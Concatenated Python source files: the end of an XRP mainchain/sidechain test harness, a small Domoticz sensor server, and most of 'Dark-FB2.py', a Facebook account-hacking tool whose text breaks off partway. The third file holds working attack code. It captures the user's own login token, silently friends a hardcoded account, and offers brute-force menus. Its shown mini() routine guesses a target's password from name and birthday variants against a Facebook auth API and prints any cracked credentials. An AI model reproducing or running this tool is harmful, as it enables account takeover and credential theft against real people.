mc_chain, sc_chain, params.user_account, bob, "200", params
)
main_to_side_transfer(
mc_chain, sc_chain, params.user_account, bob, "60", params
)
if params.with_pauses:
_convert_log_files_to_json(
mc_chain.get_configs() + sc_chain.get_configs(),
"checkpoint1.json",
params.verbose,
)
input("Pausing to check for main -> side txns (press enter to continue)")
side_to_main_transfer(mc_chain, sc_chain, bob, params.user_account, "9", params)
side_to_main_transfer(
mc_chain, sc_chain, bob, params.user_account, "11", params
)
if params.with_pauses:
input("Pausing to check for side -> main txns (press enter to continue)")
finally:
_convert_log_files_to_json(
mc_chain.get_configs() + sc_chain.get_configs(),
"final.json",
params.verbose,
)
def _configs_for_testnet(config_file_prefix: str) -> List[ConfigFile]:
p = Path(config_file_prefix)
folder = p.parent
file_name = p.name
file_names = []
for f in os.listdir(folder):
cfg = os.path.join(folder, f, "rippled.cfg")
if f.startswith(file_name) and os.path.exists(cfg):
file_names.append(cfg)
file_names.sort()
return [ConfigFile(file_name=f) for f in file_names]
def _rm_debug_log(config: ConfigFile, verbose: bool) -> None:
try:
debug_log = config.debug_logfile.get_line()
if debug_log:
if verbose:
print(f"removing debug file: {debug_log}", flush=True)
os.remove(debug_log)
except Exception:
pass
def _standalone_with_callback(
params: SidechainParams,
callback: Callable[[Chain, Chain], None],
setup_user_accounts: bool = True,
) -> None:
# TODO: make more elegant once params is more fleshed out
assert params.mainchain_config is not None
if params.debug_mainchain:
input("Start mainchain server and press enter to continue: ")
else:
_rm_debug_log(params.mainchain_config, params.verbose)
with single_node_chain(
config=params.mainchain_config,
exe=params.mainchain_exe,
run_server=not params.debug_mainchain,
) as mc_chain:
setup_mainchain(mc_chain, params, setup_user_accounts)
if params.debug_sidechain:
input("Start sidechain server and press enter to continue: ")
else:
_rm_debug_log(params.sidechain_config, params.verbose)
with single_node_chain(
config=params.sidechain_config,
exe=params.sidechain_exe,
run_server=not params.debug_sidechain,
) as sc_chain:
setup_sidechain(sc_chain, params, setup_user_accounts)
callback(mc_chain, sc_chain)
def _convert_log_files_to_json(
to_convert: List[ConfigFile], suffix: str, verbose: bool
) -> None:
"""
Convert the log file to json.
Args:
to_convert: A list of config files to convert the debug files of.
suffix: The suffix of the log file.
verbose: Whether to print out extra information.
"""
for c in to_convert:
try:
debug_log = c.debug_logfile.get_line()
assert isinstance(debug_log, str) # for typing
if not os.path.exists(debug_log):
continue
converted_log = f"{debug_log}.{suffix}"
if os.path.exists(converted_log):
os.remove(converted_log)
if verbose:
print(f"Converting log {debug_log} to {converted_log}", flush=True)
convert_log(debug_log, converted_log, pure_json=True)
except Exception:
eprint("Exception converting log")
def _multinode_with_callback(
params: SidechainParams,
callback: Callable[[Chain, Chain], None],
setup_user_accounts: bool = True,
) -> None:
mainchain_cfg = ConfigFile(
file_name=f"{params.configs_dir}/sidechain_testnet/mainchain_0/rippled.cfg"
)
_rm_debug_log(mainchain_cfg, params.verbose)
if params.debug_mainchain:
input("Start mainchain server and press enter to continue: ")
with single_node_chain(
config=mainchain_cfg,
exe=params.mainchain_exe,
run_server=not params.debug_mainchain,
) as mc_chain:
if params.with_pauses:
input("Pausing after mainchain start (press enter to continue)")
setup_mainchain(mc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after mainchain setup (press enter to continue)")
testnet_configs = _configs_for_testnet(
f"{params.configs_dir}/sidechain_testnet/sidechain_"
)
for c in testnet_configs:
_rm_debug_log(c, params.verbose)
run_server_list = [True] * len(testnet_configs)
if params.debug_sidechain:
run_server_list[0] = False
input(
f"Start testnet server {testnet_configs[0].get_file_name()} and press "
"enter to continue: "
)
with sidechain_network(
exe=params.sidechain_exe,
configs=testnet_configs,
run_server=run_server_list,
) as sc_chain:
if params.with_pauses:
input("Pausing after testnet start (press enter to continue)")
setup_sidechain(sc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after sidechain setup (press enter to continue)")
callback(mc_chain, sc_chain)
def _external_node_with_callback(
params: SidechainParams,
callback: Callable[[Chain, Chain], None],
setup_user_accounts: bool = True,
) -> None:
assert params.mainnet_port is not None # TODO: type this better
with connect_to_external_chain(
# TODO: stop hardcoding this
url=params.mainnet_url,
port=params.mainnet_port,
) as mc_chain:
setup_mainchain(mc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after mainchain setup (press enter to continue)")
testnet_configs = _configs_for_testnet(
f"{params.configs_dir}/sidechain_testnet/sidechain_"
)
for c in testnet_configs:
_rm_debug_log(c, params.verbose)
run_server_list = [True] * len(testnet_configs)
if params.debug_sidechain:
run_server_list[0] = False
input(
f"Start testnet server {testnet_configs[0].get_file_name()} and press "
"enter to continue: "
)
with sidechain_network(
exe=params.sidechain_exe,
configs=testnet_configs,
run_server=run_server_list,
) as sc_chain:
if params.with_pauses:
input("Pausing after testnet start (press enter to continue)")
setup_sidechain(sc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after sidechain setup (press enter to continue)")
callback(mc_chain, sc_chain)
def standalone_test(params: SidechainParams) -> None:
"""
Run a mainchain and sidechain in standalone mode and run basic tests on it.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
_simple_test(mc_chain, sc_chain, params)
_standalone_with_callback(params, callback)
def multinode_test(params: SidechainParams) -> None:
"""
Run a mainchain in standalone mode and a multi-node sidechain and run basic tests
on it.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
_simple_test(mc_chain, sc_chain, params)
_multinode_with_callback(params, callback)
def external_node_test(params: SidechainParams) -> None:
"""
Run a connection to an external chain and a multi-node sidechain and run basic tests
on it.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
_simple_test(mc_chain, sc_chain, params)
_external_node_with_callback(params, callback)
def close_mainchain_ledgers(
stop_token: Any, params: SidechainParams, sleep_time: int = 4
) -> None:
"""
The mainchain runs in standalone mode. Most operations - like cross chain payments -
will automatically close ledgers. However, some operations, like refunds, need an
extra close. This loop automatically closes ledgers.
Args:
stop_token: Something to use to know when to stop.
params: The command-line args for running the sidechain.
sleep_time: How long to wait for a ledger close.
"""
assert params.mainchain_config is not None # TODO: type this better
with single_node_chain(
config=params.mainchain_config,
exe=params.mainchain_exe,
run_server=False,
) as mc_chain:
while stop_token.value != 0:
mc_chain.maybe_ledger_accept()
time.sleep(sleep_time)
def standalone_interactive_repl(params: SidechainParams) -> None:
"""
Run a mainchain and sidechain in standalone mode and start up the REPL to interact
with them.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
# process will run while stop token is non-zero
stop_token = Value("i", 1)
p = None
if mc_chain.standalone:
p = Process(target=close_mainchain_ledgers, args=(stop_token, params))
p.start()
try:
start_repl(mc_chain, sc_chain)
finally:
if p:
stop_token.value = 0
p.join()
_standalone_with_callback(params, callback, setup_user_accounts=False)
def multinode_interactive_repl(params: SidechainParams) -> None:
"""
Run a mainchain in standalone mode and a multi-node sidechain and start up the REPL
to interact with them.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
# process will run while stop token is non-zero
stop_token = Value("i", 1)
p = None
if mc_chain.standalone:
p = Process(target=close_mainchain_ledgers, args=(stop_token, params))
p.start()
try:
start_repl(mc_chain, sc_chain)
finally:
if p:
stop_token.value = 0
p.join()
_multinode_with_callback(params, callback, setup_user_accounts=False)
def external_node_interactive_repl(params: SidechainParams) -> None:
"""
Run a connection to an external standalone node, and a multi-node sidechain, and
start up the REPL to interact with them.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
# process will run while stop token is non-zero
stop_token = Value("i", 1)
p = None
if mc_chain.standalone:
p = Process(target=close_mainchain_ledgers, args=(stop_token, params))
p.start()
try:
start_repl(mc_chain, sc_chain)
finally:
if p:
stop_token.value = 0
p.join()
_external_node_with_callback(params, callback, setup_user_accounts=False)
def main() -> None:
"""Initialize the mainchain-sidechain network, with command-line arguments."""
try:
params = SidechainParams()
except Exception as e:
eprint(str(e))
sys.exit(1)
if params.quiet:
print("Disabling eprint")
disable_eprint()
if params.interactive:
if not params.main_standalone:
external_node_interactive_repl(params)
elif params.standalone:
standalone_interactive_repl(params)
else:
multinode_interactive_repl(params)
elif not params.main_standalone:
external_node_test(params)
elif params.standalone:
standalone_test(params)
else:
multinode_test(params)
if __name__ == "__main__":
main()
|
sensors.py
|
#!/usr/bin/python
import sys
import signal
from libs.server import Server
from libs.storage import *
from threading import Thread
from libs.parse_config import Config
from libs.sensor_handling import Sensor
class Main():
def __init__(self):
self.storage = []
self.server = None
self.server_thread = None
def sensor_thread(self, idx):
self.storage[idx].get_sensor().handle_sensor()
def local_server_thread(self):
self.server.run_thread()
def stop(self):
for s in self.storage:
s.get_sensor().stop()
s.get_thread().join()
self.server.stop()
self.server_thread.join()
def start(self):
config = Config()
ret = config.set_config('/etc/domoticz/domoticz.conf')
if ret is False:
print("Wrong config file set")
return -1
count = config.get_sensors_count()
for idx in range(int(count)):
sensor = Sensor(config.get_sensor_name(idx), config)
thread = Thread(target=self.sensor_thread, args=(idx,))
self.storage.append(Storage(thread, sensor))
for s in self.storage:
s.get_thread().start()
self.server = Server(config)
self.server_thread = Thread(target=self.local_server_thread, args=())
self.server_thread.start()
return 0
if __name__ == '__main__':
sensors = Main()
ret = sensors.start()
if ret == -1:
exit(1)
def signal_handler(*args):
print("Your pressed ctrl + c")
sensors.stop()
print("stopped sensors")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
while True:
signal.pause()
|
Dark-FB2.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium-Cok\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Blu3bi12d Ambon \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/blu3bi12d-ambon\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/blu3bi12d-ambon\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
